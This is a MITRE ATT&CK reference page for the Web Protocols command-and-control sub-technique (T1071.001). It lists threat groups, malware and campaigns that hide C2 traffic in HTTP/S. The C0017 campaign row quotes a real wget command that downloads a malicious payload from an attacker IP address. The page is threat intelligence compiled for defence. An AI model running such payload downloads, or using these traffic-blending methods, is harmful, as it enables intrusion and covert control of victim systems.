Sub-technique of T1071 Application Layer Protocol.View on attack.mitre.org
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as HTTP/S and WebSocket that carry web traffic may be very common in environments. HTTP/S packets have many fields and headers in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.
Rules on DetectionCode tagged with T1071.001.
| Used by | Procedure example |
|---|---|
| GroupAPT18 | APT18 uses HTTP for C2 communications. |
| GroupAPT19 | APT19 used HTTP for C2 communications. APT19 also used an HTTP malware variant to communicate over HTTP for C2. |
| GroupAPT28 | Later implants used by APT28, such as CHOPSTICK, use a blend of HTTP, HTTPS, and other legitimate channels for C2, depending on module configuration. |
| GroupAPT32 | APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker controlled domains to download additional frameworks. The group has also used downloaded encrypted payloads over HTTP. |
| GroupAPT33 | APT33 has used HTTP for command and control. |
| GroupAPT37 | APT37 uses HTTPS to conceal C2 communications. |
| GroupAPT38 | APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS. |
| GroupAPT39 | APT39 has used HTTP in communications with C2. |
| Used by | Procedure example |
|---|---|
| Malware3PARA RAT | 3PARA RAT uses HTTP for command and control. |
| Malware4H RAT | 4H RAT uses HTTP for command and control. |
| MalwareABK | ABK has the ability to use HTTP in communications with C2. |
| MalwareAction RAT | Action RAT can use HTTP to communicate with C2 servers. |
| MalwareADVSTORESHELL | ADVSTORESHELL connects to port 80 of a C2 server using Wininet API. Data is exchanged via HTTP POSTs. |
| MalwareAgent Tesla | Agent Tesla has used HTTP for C2 communications. |
| MalwareAmadey | Amadey has used HTTP for C2 communications. |
| MalwareAnchor | Anchor has used HTTP and HTTPS in C2 communications. |
View all 344 software examples
| Used by | Procedure example |
|---|---|
| Campaign2015 Ukraine Electric Power Attack | During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. |
| Campaign3CX Supply Chain Attack | During the 3CX Supply Chain Attack, AppleJeus's COLDCAT C2 leverages cookie headers to contain data over HTTPS. Cookies also contain hardcoded variables `__tutma` or `__tutmc` in the payload's HTTPS request. |
| CampaignAPT41 DUST | APT41 DUST used HTTPS for command and control. |
| CampaignArcaneDoor | ArcaneDoor command and control activity was conducted through HTTP. |
| CampaignC0017 | During C0017, APT41 ran `wget http://103.224.80[.]44:8080/kernel` to download malicious payloads. |
| CampaignC0018 | During C0018, the threat actors used HTTP for C2 communications. |
| CampaignC0021 | During C0021, the threat actors used HTTP for some of their C2 communications. |
| CampaignFrankenstein | During Frankenstein, the threat actors used HTTP GET requests for C2. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.